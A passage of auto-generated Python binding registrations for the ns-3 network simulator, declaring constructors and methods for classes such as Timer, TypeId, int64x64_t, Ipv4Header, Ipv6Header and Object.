    cls.add_method('SetImplementation', 'void', [param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')], is_static=True)
    # static void SetScheduler(ns3::ObjectFactory schedulerFactory)
    cls.add_method('SetScheduler', 'void', [param('ns3::ObjectFactory', 'schedulerFactory')], is_static=True)
    # static void Stop(), plus the Time-bounded overload.
    cls.add_method('Stop', 'void', [], is_static=True)
    cls.add_method('Stop', 'void', [param('ns3::Time const &', 'time')], is_static=True)
    return
def register_Ns3Tag_methods(root_module, cls):
    """Register ns3::Tag, the abstract base class for packet tags (tag.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Tag const &', 'arg0')])
    # Pure-virtual serialization interface subclasses must implement.
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # void Print(std::ostream & os) const [pure virtual]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True)
    # void Serialize(ns3::TagBuffer i) const [pure virtual]
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3TagBuffer_methods(root_module, cls):
    """Register ns3::TagBuffer read/write accessors (tag-buffer.h, module 'network')."""
    # Copy constructor and (start, end) range constructor.
    cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
    cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
    # void CopyFrom(ns3::TagBuffer o)
    cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')])
    # Bulk and typed readers.
    cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('ReadDouble', 'double', [])
    cls.add_method('ReadU16', 'uint16_t', [])
    cls.add_method('ReadU32', 'uint32_t', [])
    cls.add_method('ReadU64', 'uint64_t', [])
    cls.add_method('ReadU8', 'uint8_t', [])
    # void TrimAtEnd(uint32_t trim)
    cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')])
    # Bulk and typed writers.
    cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('WriteDouble', 'void', [param('double', 'v')])
    cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')])
    cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')])
    cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')])
    cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')])
    return
def register_Ns3Timer_methods(root_module, cls):
    """Register ns3::Timer constructors and methods (timer.h, module 'core')."""
    # Copy, default, and DestroyPolicy constructors.
    cls.add_constructor([param('ns3::Timer const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Timer::DestroyPolicy', 'destroyPolicy')])
    # void Cancel()
    cls.add_method('Cancel', 'void', [])
    # Delay and state accessors.
    cls.add_method('GetDelay', 'ns3::Time', [], is_const=True)
    cls.add_method('GetDelayLeft', 'ns3::Time', [], is_const=True)
    cls.add_method('GetState', 'ns3::Timer::State', [], is_const=True)
    # State predicates.
    cls.add_method('IsExpired', 'bool', [], is_const=True)
    cls.add_method('IsRunning', 'bool', [], is_const=True)
    cls.add_method('IsSuspended', 'bool', [], is_const=True)
    # Lifecycle controls.
    cls.add_method('Remove', 'void', [])
    cls.add_method('Resume', 'void', [])
    # Schedule() plus its explicit-delay overload.
    cls.add_method('Schedule', 'void', [])
    cls.add_method('Schedule', 'void', [param('ns3::Time', 'delay')])
    # void SetDelay(ns3::Time const & delay)
    cls.add_method('SetDelay', 'void', [param('ns3::Time const &', 'delay')])
    # void Suspend()
    cls.add_method('Suspend', 'void', [])
    return
def register_Ns3TimerImpl_methods(root_module, cls):
    """Register ns3::TimerImpl, the abstract timer back-end (timer-impl.h, module 'core')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::TimerImpl const &', 'arg0')])
    # Pure-virtual interface: fire the timer, and schedule it after a delay.
    cls.add_method('Invoke', 'void', [], is_pure_virtual=True, is_virtual=True)
    cls.add_method('Schedule', 'ns3::EventId', [param('ns3::Time const &', 'delay')], is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3TypeId_methods(root_module, cls):
    """Register ns3::TypeId operators, constructors, and methods (type-id.h, module 'core')."""
    # Comparison and stream operators.
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: by name, default, and copy.
    cls.add_constructor([param('char const *', 'name')])
    cls.add_constructor([])
    cls.add_constructor([param('ns3::TypeId const &', 'o')])
    # AddAttribute and its flags-taking overload.
    cls.add_method('AddAttribute', 'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    cls.add_method('AddAttribute', 'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    # ns3::TypeId AddTraceSource(name, help, accessor)
    cls.add_method('AddTraceSource', 'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
    # Attribute introspection.
    cls.add_method('GetAttribute', 'ns3::TypeId::AttributeInformation', [param('uint32_t', 'i')], is_const=True)
    cls.add_method('GetAttributeFullName', 'std::string', [param('uint32_t', 'i')], is_const=True)
    cls.add_method('GetAttributeN', 'uint32_t', [], is_const=True)
    # ns3::Callback<ObjectBase*, ...> GetConstructor() const
    cls.add_method('GetConstructor', 'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True)
    # Identity accessors.
    cls.add_method('GetGroupName', 'std::string', [], is_const=True)
    cls.add_method('GetHash', 'uint32_t', [], is_const=True)
    cls.add_method('GetName', 'std::string', [], is_const=True)
    cls.add_method('GetParent', 'ns3::TypeId', [], is_const=True)
    # Static registry enumeration.
    cls.add_method('GetRegistered', 'ns3::TypeId', [param('uint32_t', 'i')], is_static=True)
    cls.add_method('GetRegisteredN', 'uint32_t', [], is_static=True)
    # Trace-source introspection.
    cls.add_method('GetTraceSource', 'ns3::TypeId::TraceSourceInformation', [param('uint32_t', 'i')], is_const=True)
    cls.add_method('GetTraceSourceN', 'uint32_t', [], is_const=True)
    # uint16_t GetUid() const
    cls.add_method('GetUid', 'uint16_t', [], is_const=True)
    # Presence predicates.
    cls.add_method('HasConstructor', 'bool', [], is_const=True)
    cls.add_method('HasParent', 'bool', [], is_const=True)
    # ns3::TypeId HideFromDocumentation()
    cls.add_method('HideFromDocumentation', 'ns3::TypeId', [])
    # bool IsChildOf(ns3::TypeId other) const
    cls.add_method('IsChildOf', 'bool', [param('ns3::TypeId', 'other')], is_const=True)
    # Lookup helpers (by name, by hash, with and without fail-safe).
    cls.add_method('LookupAttributeByName', 'bool',
                   [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)], is_const=True)
    cls.add_method('LookupByHash', 'ns3::TypeId', [param('uint32_t', 'hash')], is_static=True)
    cls.add_method('LookupByHashFailSafe', 'bool', [param('uint32_t', 'hash'), param('ns3::TypeId *', 'tid')], is_static=True)
    cls.add_method('LookupByName', 'ns3::TypeId', [param('std::string', 'name')], is_static=True)
    cls.add_method('LookupTraceSourceByName', 'ns3::Ptr< ns3::TraceSourceAccessor const >', [param('std::string', 'name')], is_const=True)
    # bool MustHideFromDocumentation() const
    cls.add_method('MustHideFromDocumentation', 'bool', [], is_const=True)
    # Mutators.
    cls.add_method('SetAttributeInitialValue', 'bool', [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
    cls.add_method('SetGroupName', 'ns3::TypeId', [param('std::string', 'groupName')])
    cls.add_method('SetParent', 'ns3::TypeId', [param('ns3::TypeId', 'tid')])
    cls.add_method('SetUid', 'void', [param('uint16_t', 'tid')])
    return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
    """Register ns3::TypeId::AttributeInformation, a plain record of attribute metadata (type-id.h, module 'core')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
    # Public data members exposed as mutable instance attributes.
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
    cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
    cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
    """Register ns3::TypeId::TraceSourceInformation, a plain record of trace-source metadata (type-id.h, module 'core')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
    # Public data members exposed as mutable instance attributes.
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    return
def register_Ns3Empty_methods(root_module, cls):
    """Register ns3::empty (empty.h, module 'core'); only default and copy constructors exist."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::empty const &', 'arg0')])
    return
def register_Ns3Int64x64_t_methods(root_module, cls):
    """Register ns3::int64x64_t operators, constructors, and methods (int64x64-double.h, module 'core')."""
    i64x64 = root_module['ns3::int64x64_t']
    # C++ scalar types accepted on the right-hand side of the binary arithmetic
    # operators, in the original registration order.
    scalar_types = ('long long unsigned int', 'long unsigned int', 'unsigned int',
                    'short unsigned int', 'unsigned char', 'long long int', 'long int',
                    'int', 'short int', 'signed char', 'double')

    def add_arith(op):
        # One overload per plain scalar, then the int64x64_t-vs-int64x64_t form.
        for t in scalar_types:
            cls.add_binary_numeric_operator(op, i64x64, i64x64, param(t + ' const', 'right'))
        cls.add_binary_numeric_operator(op, i64x64, i64x64, param('ns3::int64x64_t const &', 'right'))

    add_arith('*')
    add_arith('+')
    # '-' additionally has a unary negation form, registered between the scalar
    # overloads and the int64x64_t overload (original order preserved).
    for t in scalar_types:
        cls.add_binary_numeric_operator('-', i64x64, i64x64, param(t + ' const', 'right'))
    cls.add_unary_numeric_operator('-')
    cls.add_binary_numeric_operator('-', i64x64, i64x64, param('ns3::int64x64_t const &', 'right'))
    add_arith('/')
    # Comparison, in-place, and stream operators.
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('>')
    cls.add_binary_comparison_operator('!=')
    for op in ('*=', '+=', '-=', '/='):
        cls.add_inplace_numeric_operator(op, param('ns3::int64x64_t const &', 'right'))
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('<=')
    cls.add_binary_comparison_operator('==')
    cls.add_binary_comparison_operator('>=')
    # Constructors: default, one per scalar numeric type, the (hi, lo) pair, and copy.
    cls.add_constructor([])
    for t in ('double', 'int', 'long int', 'long long int', 'unsigned int',
              'long unsigned int', 'long long unsigned int'):
        cls.add_constructor([param(t, 'v')])
    cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
    cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
    # Accessors and helpers.
    cls.add_method('GetDouble', 'double', [], is_const=True)
    cls.add_method('GetHigh', 'int64_t', [], is_const=True)
    cls.add_method('GetLow', 'uint64_t', [], is_const=True)
    cls.add_method('Invert', 'ns3::int64x64_t', [param('uint64_t', 'v')], is_static=True)
    cls.add_method('MulByInvert', 'void', [param('ns3::int64x64_t const &', 'o')])
    return
def register_Ns3Chunk_methods(root_module, cls):
    """Register Python bindings for ns3::Chunk (chunk.h, module 'network') on *cls*."""
    # Constructors: default, then copy.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
    # uint32_t Deserialize(ns3::Buffer::Iterator start) -- pure virtual.
    cls.add_method('Deserialize', 'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # void Print(std::ostream & os) const -- pure virtual.
    cls.add_method('Print', 'void',
                   [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
def register_Ns3DsdvHelper_methods(root_module, cls):
    """Register Python bindings for ns3::DsdvHelper (dsdv-helper.h, module 'dsdv') on *cls*."""
    # Constructors: copy, then default.
    cls.add_constructor([param('ns3::DsdvHelper const &', 'arg0')])
    cls.add_constructor([])
    # ns3::DsdvHelper * Copy() const -- virtual clone.
    cls.add_method('Copy', 'ns3::DsdvHelper *', [],
                   is_const=True, is_virtual=True)
    # ns3::Ptr<ns3::Ipv4RoutingProtocol> Create(ns3::Ptr<ns3::Node> node) const
    cls.add_method('Create', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
                   [param('ns3::Ptr< ns3::Node >', 'node')],
                   is_const=True, is_virtual=True)
    # void Set(std::string name, ns3::AttributeValue const & value)
    cls.add_method('Set', 'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
def register_Ns3Header_methods(root_module, cls):
    """Register Python bindings for ns3::Header (header.h, module 'network') on *cls*."""
    # operator<< support for printing headers.
    cls.add_output_stream_operator()
    # Constructors: default, then copy.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Header const &', 'arg0')])
    # Pure-virtual (de)serialization interface every concrete header implements.
    cls.add_method('Deserialize', 'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void',
                   [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
def register_Ns3Ipv4Header_methods(root_module, cls):
    """Register Python bindings for ns3::Ipv4Header (ipv4-header.h, module 'internet') on *cls*."""
    # Constructors: copy, then default.
    cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')])
    cls.add_constructor([])
    # Deserialization from a buffer iterator.
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True)
    # DSCP / ECN string helpers.
    cls.add_method('DscpTypeToString', 'std::string', [param('ns3::Ipv4Header::DscpType', 'dscp')], is_const=True)
    cls.add_method('EcnTypeToString', 'std::string', [param('ns3::Ipv4Header::EcnType', 'ecn')], is_const=True)
    cls.add_method('EnableChecksum', 'void', [])
    # Const field accessors.
    cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetDscp', 'ns3::Ipv4Header::DscpType', [], is_const=True)
    cls.add_method('GetEcn', 'ns3::Ipv4Header::EcnType', [], is_const=True)
    cls.add_method('GetFragmentOffset', 'uint16_t', [], is_const=True)
    cls.add_method('GetIdentification', 'uint16_t', [], is_const=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetPayloadSize', 'uint16_t', [], is_const=True)
    cls.add_method('GetProtocol', 'uint8_t', [], is_const=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetTos', 'uint8_t', [], is_const=True)
    cls.add_method('GetTtl', 'uint8_t', [], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Flag queries.
    cls.add_method('IsChecksumOk', 'bool', [], is_const=True)
    cls.add_method('IsDontFragment', 'bool', [], is_const=True)
    cls.add_method('IsLastFragment', 'bool', [], is_const=True)
    # Printing and serialization.
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True)
    # Field mutators.
    cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'destination')])
    cls.add_method('SetDontFragment', 'void', [])
    cls.add_method('SetDscp', 'void', [param('ns3::Ipv4Header::DscpType', 'dscp')])
    cls.add_method('SetEcn', 'void', [param('ns3::Ipv4Header::EcnType', 'ecn')])
    cls.add_method('SetFragmentOffset', 'void', [param('uint16_t', 'offsetBytes')])
    cls.add_method('SetIdentification', 'void', [param('uint16_t', 'identification')])
    cls.add_method('SetLastFragment', 'void', [])
    cls.add_method('SetMayFragment', 'void', [])
    cls.add_method('SetMoreFragments', 'void', [])
    cls.add_method('SetPayloadSize', 'void', [param('uint16_t', 'size')])
    cls.add_method('SetProtocol', 'void', [param('uint8_t', 'num')])
    cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'source')])
    cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')])
    cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')])
def register_Ns3Ipv6Header_methods(root_module, cls):
    """Register Python bindings for ns3::Ipv6Header (ipv6-header.h, module 'internet') on *cls*."""
    # Constructors: copy, then default.
    cls.add_constructor([param('ns3::Ipv6Header const &', 'arg0')])
    cls.add_constructor([])
    # Deserialization from a buffer iterator.
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'start')], is_virtual=True)
    # Const field accessors.
    cls.add_method('GetDestinationAddress', 'ns3::Ipv6Address', [], is_const=True)
    cls.add_method('GetFlowLabel', 'uint32_t', [], is_const=True)
    cls.add_method('GetHopLimit', 'uint8_t', [], is_const=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetNextHeader', 'uint8_t', [], is_const=True)
    cls.add_method('GetPayloadLength', 'uint16_t', [], is_const=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    cls.add_method('GetSourceAddress', 'ns3::Ipv6Address', [], is_const=True)
    cls.add_method('GetTrafficClass', 'uint8_t', [], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Printing and serialization.
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')], is_const=True, is_virtual=True)
    # Field mutators.
    cls.add_method('SetDestinationAddress', 'void', [param('ns3::Ipv6Address', 'dst')])
    cls.add_method('SetFlowLabel', 'void', [param('uint32_t', 'flow')])
    cls.add_method('SetHopLimit', 'void', [param('uint8_t', 'limit')])
    cls.add_method('SetNextHeader', 'void', [param('uint8_t', 'next')])
    cls.add_method('SetPayloadLength', 'void', [param('uint16_t', 'len')])
    cls.add_method('SetSourceAddress', 'void', [param('ns3::Ipv6Address', 'src')])
    cls.add_method('SetTrafficClass', 'void', [param('uint8_t', 'traffic')])
def register_Ns3Object_methods(root_module, cls):
    """Register Python bindings for ns3::Object (object.h, module 'core') on *cls*."""
    # Public default constructor.
    cls.add_constructor([])
    # Aggregation and lifecycle API.
    cls.add_method('AggregateObject', 'void', [param('ns3::Ptr< ns3::Object >', 'other')])
    cls.add_method('Dispose', 'void', [])
    cls.add_method('GetAggregateIterator', 'ns3::Object::AggregateIterator', [], is_const=True)
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Initialize', 'void', [])
    # Copy constructor is protected in the C++ class.
    cls.add_constructor([param('ns3::Object const &', 'o')], visibility='protected')
    # Protected virtual hooks for subclasses.
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True)
    cls.add_method('NotifyNewAggregate', 'void', [], visibility='protected', is_virtual=True)
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
    """Register Python bindings for ns3::Object::AggregateIterator (object.h, module 'core') on *cls*."""
    # Constructors: copy, then default.
    cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
    cls.add_constructor([])
    # bool HasNext() const
    cls.add_method('HasNext', 'bool', [], is_const=True)
    # ns3::Ptr<ns3::Object const> Next()
    cls.add_method('Next', 'ns3::Ptr< ns3::Object const >', [])
def register_Ns3RandomVariableStream_methods(root_module, cls):
    """Register Python bindings for ns3::RandomVariableStream (random-variable-stream.h, module 'core') on *cls*."""
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Default constructor.
    cls.add_constructor([])
    # Stream selection and antithetic-variate configuration.
    cls.add_method('SetStream', 'void', [param('int64_t', 'stream')])
    cls.add_method('GetStream', 'int64_t', [], is_const=True)
    cls.add_method('SetAntithetic', 'void', [param('bool', 'isAntithetic')])
    cls.add_method('IsAntithetic', 'bool', [], is_const=True)
    # Pure-virtual draw interface implemented by concrete distributions.
    cls.add_method('GetValue', 'double', [], is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_pure_virtual=True, is_virtual=True)
    # Protected access to the underlying RngStream.
    cls.add_method('Peek', 'ns3::RngStream *', [], is_const=True, visibility='protected')
def register_Ns3SequentialRandomVariable_methods(root_module, cls):
    """Register Python bindings for ns3::SequentialRandomVariable (random-variable-stream.h, module 'core') on *cls*."""
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Default constructor.
    cls.add_constructor([])
    # Const accessors for the sequence parameters.
    cls.add_method('GetMin', 'double', [], is_const=True)
    cls.add_method('GetMax', 'double', [], is_const=True)
    cls.add_method('GetIncrement', 'ns3::Ptr< ns3::RandomVariableStream >', [], is_const=True)
    cls.add_method('GetConsecutive', 'uint32_t', [], is_const=True)
    # Virtual draw interface overrides.
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::AttributeAccessor> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::AttributeChecker> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::AttributeValue> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::CallbackImplBase> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::EventImpl> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::Hash::Implementation> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter< ns3::Hash::Implementation > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::Ipv4MulticastRoute> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::Ipv4Route> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::NixVector> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::OutputStreamWrapper> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::Packet> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
    """Register bindings for the SimpleRefCount<ns3::TraceSourceAccessor> instantiation on *cls*."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
def register_Ns3Socket_methods(root_module, cls):
    """Register Python bindings for the ns3::Socket abstract base class.

    Registers constructors, the public virtual socket API (Bind/Connect/
    Send/Recv families, option getters/setters, callback setters) and the
    protected notification helpers on *cls*.

    NOTE(review): this file is PyBindGen-generated; the order of add_method
    calls determines overload registration order — do not reorder by hand.
    """
    ## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor]
